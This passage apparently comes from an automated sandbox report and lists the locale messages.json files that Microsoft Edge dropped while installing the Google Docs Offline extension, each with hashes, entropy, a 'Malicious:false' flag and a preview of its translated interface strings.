                                                                                                                                                                                                                                                                                      Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                      MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                      SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                      SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                      SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):963
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                      MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                      SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                      SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                      SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1320
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                      MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                      SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                      SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                      SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):884
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                      MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                      SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                      SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                      SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):980
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                      MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                      SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                      SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                      SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1941
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                      MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                      SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                      SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                      SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1969
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                      MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                      SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                      SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                      SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1674
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                      MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                      SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                      SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                      SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1063
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                      MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                      SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                      SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                      SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1333
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                      MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                      SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                      SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                      SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1263
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                      MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                      SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                      SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                      SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1074
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                      MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                      SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                      SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                      SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):879
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                      MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                      SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                      SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                      SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1205
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                      MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                      SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                      SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                      SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):843
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
